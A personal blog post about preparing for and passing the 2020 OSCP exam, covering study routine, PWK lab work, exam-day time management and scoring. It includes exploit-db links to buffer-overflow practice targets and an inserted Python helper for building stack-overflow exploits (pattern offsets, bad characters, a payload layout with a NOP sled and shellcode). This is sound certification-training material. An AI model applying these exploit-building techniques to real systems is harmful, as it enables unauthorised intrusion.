
OSCP 2020: A Journey of “Well Time Management”

Updated: Jan 27, 2021

Well, I began my hacking journey as a bug hunter. From the start I decided that one day I would get the OSCP. While doing bug hunting I got into the Hall of Fame of well-known security companies such as Tenable (Nessus), SonicWall and CERT-EU, and was twice listed among the top 15 security researchers by the National Critical Information Infrastructure Protection Centre (NCIIPC), an organisation of the Indian Government. I hold the CEH, eJPT and MCSA certifications. Additionally, I am a two-time state winner of the Gujarat State Powerlifting Championship (2016-17 and 2018), and I ranked third in Gujarat Technological University (2016-17). I am sharing my time management approach for the OSCP exam with everyone, so that everyone can achieve this cool cert with passion.



Let's begin

Before I started the penetration testing training (PWK/OSCP), every country had its own COVID lockdown period. During the lockdown I did other certifications too, to clear up my doubts and keep polishing my skills. Currently I have a full-time job in the infosec field, so I get less time for the PWK labs. Every day after office hours I spent 2 to 3 hours on a Hack The Box machine from the TJnull list, which helped me dive deep into how a small vulnerability turns into RCE. OSCP is mainly focused on how to get RCE. That's why I like it: I come from a bug hunting background, and that is a small part of OSCP 😊 After lockdown I had only Sundays for my core study; every Sunday I did HTB only, and read different walkthroughs of the same HTB machine while doing so. Whenever I completed an HTB machine I crossed it off on my calendar, so I knew how many machines were still left.


(Calendar images: the first month, and the second month.)

I know how much GitHub helps us with easy scripts. Even when my friends called me many times on Sundays to hang out, I did not go out with them for a few months. Before enrolling in PWK my life was like: WAKE UP, OFFICE WORK, LUNCH, OFFICE WORK, DINNER, HTB, SLEEP, REPEAT. While studying my own infosec stuff I was sometimes very depressed; at those times I remembered my favourite anime characters' thoughts: DBS: "Push through the pain, giving up hurts more." (Prince Vegeta); NARUTO: "Hard work is worthless for those that don't believe in themselves." (Naruto Uzumaki). The song mentioned below also motivated me a lot. After listening to it, I started my work again with good vibes.

First, I want to say thank you to all my close friends, family members and co-workers who believed in me. During my lab time my laptop crashed, so I needed to upgrade the RAM to improve its performance. I asked one of my close friends for his laptop, and he was the only one who told me, "Yes, whenever you want my laptop, just take it." I do not want to share his name for privacy reasons, but I will share his nickname: "KIAN-K9". I also have good connections with some local shops, so I bought some hardware from them. Now my Kali VM was upgraded to a high spec. OffSec has a very good Discord server. I found many people there who had done the OSCP and made very good connections with them. They all come from different infosec fields and have very good knowledge of security concepts. At the same time I felt very bad about myself, because compared to them my knowledge was nowhere near theirs. Then I remembered the "Try Harder" mantra. I set my mind to learn new hacking stuff every day and kept improving my knowledge. I never stopped learning 😎

PWK Lab

Let's enter the lab. I spent some time going through the OffSec forums, downloading the material and checking the control panel. OffSec now provides a pathway from easy to insane machines; after connecting to the VPN you will get the path link below your OSID number. On the first day I was very excited about the lab. There are Public, IT, Dev and Admin networks in the lab environment, as well as sandbox environments and a forum. I completed 35+ machines across the Public, IT, Dev and Admin networks, so pivoting must be learned, because it really helps to chain exploits. My advice for everyone who wants to pass the OSCP in a single shot: please do the lab report. I know it is painful, because the new PDF has 850+ pages and there are a lot of exercises too. You will find the same machines on HTB and VulnHub, so you can practise on those as well. In my view the lab exercises are more insane than the lab machines; once you reach the Active Directory part you will feel the real pain, but don't give up, because you have already reached the end of the lab exercises. I did my lab report in 10 days, which left 50 days for the lab machines. One more piece of advice: make good notes of everything, because they will help you in the exam. Believe me, I have 50+ pages of notes and they helped me work fast; once you have them you do not need to do a lot of Google searching during the exam. For web, you must build your own wordlist; it helps a lot with fast searching, because sometimes DirBuster or gobuster will not complete the whole wordlist. Be sure to watch the ALPHA and BETA machine walkthroughs from the forum and understand how g0tmi1k hacks the machines.


Before my exam I practised on many Buffer Overflow (BOF) applications, because this is really the sweet spot. Studying the subject from the PDF and videos, understanding the details and practising on the relevant applications will be enough to solve the BOF in the exam. My suggestion is to have the BOF applications below done before booking the exam.


1) SLMail: https://www.exploit-db.com/exploits/638/

2) Minishare 1.4.1: https://www.exploit-db.com/exploits/636/

3) Savant 3.1: https://www.exploit-db.com/exploits/10434/
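As an added example that is not part of the original post, the Python helpers below cover the mechanical steps of the stack-based BOF workflow practised on the three applications above: a cyclic pattern generator with offset lookup (the same idea as Metasploit's pattern_create/pattern_offset), a bad-character test string that drops bytes already found to be bad, and a payload layout builder. The offset 1337 and the return address 0x11223344 used in the demo are hypothetical values chosen for illustration, not taken from any of the listed targets.

```python
"""Stack-based BOF workflow helpers (constructed example, offline).

Workflow: crash with a cyclic pattern -> read EIP in the debugger ->
compute the offset -> send all byte values to find bad characters ->
assemble junk + return address + NOP sled + shellcode.
"""
import itertools
import string
import struct


def cyclic_pattern(length):
    """Return `length` bytes of the 'Aa0Aa1Aa2...' pattern.

    Each triplet is (uppercase, lowercase, digit) in lexicographic order,
    so every 4-byte window is unique up to 26*26*10*3 = 20280 bytes.
    """
    out = bytearray()
    for u, l, d in itertools.product(string.ascii_uppercase,
                                     string.ascii_lowercase,
                                     string.digits):
        out += (u + l + d).encode()
        if len(out) >= length:
            return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes is not unique")


def dword_at(pattern, offset):
    """Little-endian dword at `offset`, i.e. what EIP would hold if the
    saved return address were overwritten by these four pattern bytes."""
    return struct.unpack("<I", pattern[offset:offset + 4])[0]


def pattern_offset(pattern, eip_value):
    """Offset of the 4 bytes that landed in EIP (as displayed by the
    debugger, e.g. 0x39694438), or -1 if they are not in the pattern."""
    needle = struct.pack("<I", eip_value)
    return pattern.find(needle)


def badchar_string(excluded=(0x00,)):
    """All 256 byte values minus the ones already known to be bad.

    Send this after the offset is known and compare the bytes in memory
    with what was sent; the first byte that differs (or truncates the
    string) is bad and gets added to `excluded` for the next round.
    """
    return bytes(b for b in range(256) if b not in excluded)


def build_payload(offset, ret_addr, nops=16, shellcode=b""):
    """Classic layout: junk up to EIP, return address (little-endian,
    e.g. a JMP ESP gadget), NOP sled, then shellcode."""
    return (b"A" * offset
            + struct.pack("<I", ret_addr)
            + b"\x90" * nops
            + shellcode)


if __name__ == "__main__":
    # Hypothetical crash: pretend the debugger showed EIP = pattern[1337:1341].
    pattern = cyclic_pattern(3000)
    eip = dword_at(pattern, 1337)
    print("EIP 0x%08x -> offset %d" % (eip, pattern_offset(pattern, eip)))
    # Second bad-char round after finding \x00 and \x0a bad.
    print("bad-char string length:", len(badchar_string((0x00, 0x0a))))
    # Hypothetical JMP ESP address and an INT3 as stand-in shellcode.
    payload = build_payload(1337, 0x11223344, shellcode=b"\xcc")
    print("payload length:", len(payload))
```

The offset lookup relies on the pattern being unique per 4-byte window, which is why the builder refuses lengths beyond 20280 bytes; if a crash needs a longer buffer, search for the window in a pattern of a different alphabet rather than trusting the first match.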


Final Exam Day 🤖


Cheat Sheet

[Believe me, you will get everything from the links below.]


https://oscpnotes.infosecsanyam.in/My_OSCP_Preparation_Notes.html

https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65

https://book.hacktricks.xyz/pentesting-methodology

https://cheatsheet.haax.fr/other-systems/


Game Day


OffSec held a 15-minute session before the exam started. Once verification was done by OffSec, I started my exam. I made a Google Sheet like the one shown in the images. I followed my plan, because many people do not manage their time in the exam and fail. I had done a lot of hands-on practice on many different BOF applications. In my group a few people had done the BOF in under 25 minutes; because of them I worked on my speed to do the BOF in under 2 hours. So I did the BOF in 1 hour 45 minutes with all the steps and made the POC, plus 15 minutes to cross-verify the POC. While I was doing this I ran the AutoRecon tool in the background for the rest of the machines. It was very helpful to have all the enumeration information in one single window.


Now I had 25 points in my bucket. The next goal was to take down a 20-point machine. It took me 2 more hours to exploit it, and I followed my plan, but everyone knows a plan does not always work the way it was meant to; it got messed up, and the same thing happened to me. After that I started on another 20-point machine. It killed me inside, because I did not find anything suspicious while scanning. I checked everything, so I just left the machine after spending 4 hours on it. Instead I went for the next big 25-point machine. In the beginning I spent approximately 2 hours on enumeration, and after that I found the injection point.


I had 25 + 20 + 12 = 57 points in hand. (OffSec never says how many points you get for the user part. I got the user part on a 25-point machine, so I put the value from my best knowledge.) I needed 70 points to pass the exam. I left that machine and went for the 10-point machine, but I needed some rest for my body, so I took only 3.5 hours of sleep during the whole exam. After waking up I went at the 10-point machine with a fresh mind. It was a unique vulnerability; after spending 3 hours on it I got the shell, BOOM!!! 😉


Now I was very happy 🥂: I had 25 + 20 + 10 + 12 = 67 points in hand. Let's start the pending machine. I spent approximately 10+ hours getting the user shell on that 20-point machine. Finally I got it and was so relieved. Then I had only 4 hours left before the end of my exam, and I still had not fully cracked the 25-pointer and the 20-pointer. After taking a small break I started again on the 25-point machine. I looked at my enumeration output again, and man, I was really dumb not to look at the web hosting service. I searched for that web service on Google and found my exploit 😈. Finally, at the end of my exam I had a total of 25 + 25 + 20 + 10 + 10 = 90 points in hand. I was so relieved. That night I happily slept for 11 hours.


Then I worked on my exam report. Yes, I had my lab report too 😉. It took time to finish the exam report; I went over it twice to make it ready before the deadline.

  • Exam Report: 45+ pages

  • Lab Report: 410+ pages


I submitted the exam report, and after a few days I finally got an email from OffSec saying, "We are happy to inform you that you have successfully completed the Penetration Testing with Kali Linux certification exam and have obtained your Offensive Security Certified Professional (OSCP) certification."


Conclusion


So many sleepless nights, hard work, never giving up and, lastly, do not forget to “Try Harder”.


If you have any queries or doubts, let's connect on LinkedIn.


Thank you for Reading!!!

